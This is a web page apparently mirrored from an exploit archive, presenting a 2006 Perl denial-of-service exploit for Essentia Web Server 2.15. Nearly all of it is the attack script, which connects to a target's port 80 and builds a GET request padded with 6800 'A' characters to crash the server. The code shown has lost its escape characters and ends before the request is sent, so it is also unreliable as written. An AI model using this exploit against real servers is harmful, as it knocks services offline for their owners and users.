[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Essentia Web Server 2.15 (GET Request) Remote DoS Exploit
# Published : 2006-11-04
# Author : CorryL
# Previous Title : XM Easy Personal FTP Server <= 5.2.1 Remote Denial of Service Exploit
# Next Title : Nullsoft Winamp <= 5.3 (Ultravox-Max-Msg) Heap Overflow DoS PoC


#!/usr/bin/perl


use IO::Socket;

use Getopt::Std; getopts('h:', %args);



if (defined($args{'h'})) { $host = $args{'h'}; }

print STDERR "n-=[ Essentia Web Server 2.15 Remote DOS Exploit]=-n";

print STDERR "-=[ Discovered By CorryL          corryl80@gmail.com ]=-n";

print STDERR "-=[ Coded by CorryL     info:www.x0n3-h4ck.org ]=-nn";

if (!defined($host)) {

print "usage: perl " . $0 . " -h HOSTn";

exit();
}

$dos = "A"x6800;

print "[+] Connect to $hostn";

$socket = new IO::Socket::INET (PeerAddr => "$host",

                               PeerPort => 80,

                               Proto => 'tcp');

                               die unless $socket;

print "[+] Sending DOS byten";

         $data = "GET /$dos rnrn";

# www.Syue.com [2006-11-04]